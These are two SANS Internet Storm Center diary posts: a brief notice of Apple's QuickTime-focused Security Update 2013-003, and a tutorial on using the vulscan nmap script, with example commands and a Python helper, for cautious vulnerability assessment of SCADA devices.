Apple Security Update 2013-003

Apple released Security Update 2013-003 yesterday.

The key focus of the update is fixing a few buffer overflow conditions in QuickTime software on the OS X platform.

The impact is possible application crash or potential for arbitrary code execution.

Full details can be found here: http://support.apple.com/kb/HT5806

-Kevin

--

ISC Handler on Duty


Using nmap scripts to enhance vulnerability assessment results

SCADA environments are a big interest for me. As the person responsible for information security at a utility company, I need to ensure that risks inside those platforms are minimized in a way that any control I place does not interfere at all with the protocol and system function. That is why running things like Metasploit or Nexpose could be really dangerous if they are not well parameterized, as they could block control of the RTUs and IEDs and potentially cause a disaster if a system variable goes out of control.

There is a less risky alternative for performing vulnerability assessments of SCADA devices that still gives good results. You can use the nmap scripting engine to add vulnerability scanning functionality. The software can be downloaded from http://www.computec.ch/mruef/software/nmap_nse_vulscan-1.0.tar.gz. The csv files are vulnerability databases, and you need to place them into a directory named vulscan in the same directory as all other .nse scripts. The vulscan.nse script needs to sit with all the other nse scripts. Once installed into the nmap scripts directory, you are all set.



Let's see how it works. The first step in a vulnerability assessment is to check the open ports and the versions of all servers running there:

The vulscan script will get the service scan information as input to gather vulnerabilities inside the vulnerability databases. Now you need to use at least the following arguments:

- Service scan: This nmap scan technique is able to query for open ports and determine which protocols and servers are running on those ports. Use -sV.

- Script selection: The script you want to use is vulscan.nse, so you should use --script=vulscan.nse.

You can also use any other optional arguments used normally with nmap, as well as arguments to the vulscan script, like:

- SYN scan (-sS), connect scan (-sT) or operating system fingerprint (-O)

- Script arguments: You can define which vulnerability database you want to use. The following databases are available: CVE (--script-args vulscandb=cve.csv), Security Tracker (--script-args vulscandb=securitytracker.csv), Security Focus (--script-args vulscandb=securityfocus.csv), Open Sourced Vulnerability Database (--script-args vulscandb=osvdb.csv) and Security Consulting Information Process Vulnerability Database (--script-args vulscandb=scipvuldb.csv). If you want to use all of them, don't use this argument to the script and leave only the script selection.



In the following example, nmap will perform a SYN scan and a service scan, and use the results as input to correlate with the Security Consulting Information Process Vulnerability Database. The command being run is nmap -sS -sV --script=vulscan.nse --script-args vulscandb=scipvuldb.csv 192.168.0.110.
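If you scan a list of devices regularly, it can help to assemble that command line from a small helper so the options stay consistent and a typo in the database name is caught before anything touches a SCADA network. A minimal sketch, using only the options and database file names mentioned in this diary; the function name and the validation rules are my own.

```python
import shlex

# Database file names as listed above for the vulscandb script argument.
KNOWN_DATABASES = {"cve.csv", "securitytracker.csv", "securityfocus.csv",
                   "osvdb.csv", "scipvuldb.csv"}


def vulscan_command(target, database=None, scan_type="-sS"):
    """Build the nmap argument list for a vulscan.nse run against one target."""
    if scan_type not in ("-sS", "-sT"):
        raise ValueError("scan_type must be -sS (SYN) or -sT (connect)")
    args = ["nmap", scan_type, "-sV", "--script=vulscan.nse"]
    if database is not None:
        if database not in KNOWN_DATABASES:
            raise ValueError(f"unknown vulnerability database: {database}")
        args += ["--script-args", f"vulscandb={database}"]
    # With no database given, the script argument is omitted entirely.
    args.append(target)
    return args


if __name__ == "__main__":
    print(shlex.join(vulscan_command("192.168.0.110", "scipvuldb.csv")))
```

The list form can be handed straight to subprocess.run once you are happy with it; printing it first is a cheap safety check when the targets are control systems.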

In future diaries I will show other nmap scripts I like to use for vulnerability assessment and pentesting.

Manuel Humberto Santander Peláez

SANS Internet Storm Center - Handler

Twitter:@manuelsantander

Web:http://manuel.santander.name

e-mail: msantand at isc dot sans dot org
